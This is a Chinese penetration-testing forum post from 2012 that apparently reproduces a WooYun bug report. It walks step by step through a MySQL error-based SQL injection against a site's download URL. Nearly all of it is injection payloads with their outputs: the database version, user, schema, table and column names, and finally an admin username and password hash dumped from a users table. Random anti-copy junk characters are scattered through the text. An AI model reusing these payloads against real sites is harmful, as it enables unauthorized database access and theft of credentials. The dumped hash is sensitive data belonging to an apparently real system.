找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 php+mysql高级爆错注入经测算有效
返回列表 发新帖
查看: 2196|回复: 0
打印 上一主题 下一主题

php+mysql高级爆错注入经测算有效

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 17:52:09 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://www.wooyun.org/bugs/wooyun-2010-01666
( O' F/ z6 Y6 t/ r' v  t( b7 M
( Q7 Z7 C' @; T0 B0 S4 x之前想找个测试 没想到这有 可以测试下做个记录而已 ) I" S8 L1 f/ Q4 z3 X; p$ ~

, d6 r& D( ~3 C8 k* Fhttp://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003# G* R* j; @, u2 r3 k

/ @! z7 \/ ?( `5 q) {/data0/htdocs/leqi_new/app/myapp.php% @, H, _; G, W$ c) j

! V  q' m3 Z5 w/ ~, y3 Z 或者6 _5 Q( P3 D* a  q

, z) y# ~  j# P6 @: q$ J& R: Y) }/**********version()**********/ 5.1.49-log
' Q- h/ k( X: d+ X( dhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003/ Z/ I2 I- ]! I  D+ e& ]

7 J. _% y9 M$ |+ G- L' o/**********user()**********/  
. }9 X, @: F; Z2 l7 u4 {! ohttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0034 D7 z$ u; p: d, k2 Q* @0 j( t
0 |+ J0 C) {/ x0 s* e$ Z: {
/**********database()**********/  leqi) C% T. @, G4 A  n
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003: M: ~5 i$ [2 F5 i0 F, ?$ N

3 M% h) G+ C( l% R: q0 v+ t/**********limit依次递归爆库**********/
7 n& f/ ^; w& c! a5 Thttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003" v8 ?* W3 y/ f4 v1 D/ s
information_schema
) A7 @$ G0 w% ]http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
9 y2 \' m# j: Z& R3 Y) ~3 wleqi3 d, L% v1 c  M
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003$ H8 H) Y6 M" i! I, I
test
( V; q! x# s0 O9 Q. m1 v% D; E2 y* W6 E" G' }  d
/**********limit依次递归爆表名**********/; q" ]- D6 v; F0 B
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003; c  `0 U5 _# v  @+ g, }
users
( C, ^) s+ I  M: ?2 Z
- ]+ Q& U- a* s; t/**********limit依次递归爆字段名**********/% [8 f2 n& l# R- ]2 m: C
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0031 Q9 N1 W" N9 C
user_id,username,nickname,passwd,group_id
* q( B5 U- B0 c: C0 u  I! |5 phttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
+ U7 l) i1 g) w1 J8 Y% j$ P: E( @/wapc/5000_0005_003
) q& ^4 _7 E5 B11 21
$ K4 D. q. R9 ?1 g& q1 lhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23+ X) y9 E9 C7 ~# C7 }
/wapc/5000_0005_003
) j7 |& K" l! ]' i11 341 351 361
( I. @; V3 X4 E3 Y$ Q1 ?3 w/**********爆数据**********/3 V% h# t# g$ B( ]
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
  E6 k* C2 R* F2 @admin4 Z- ?$ ?4 |( R
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23" R$ d$ G7 n/ |' C; ]
6a8b4574ca231eb8bd52764d4978ffcd
5 f0 U) c; P" i0 U9 o6 W1 [. _+ Q
$ o% L: O) e- ?+ Z) W8 ^2 l
$ J  `" ^2 V3 g% G/ n
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表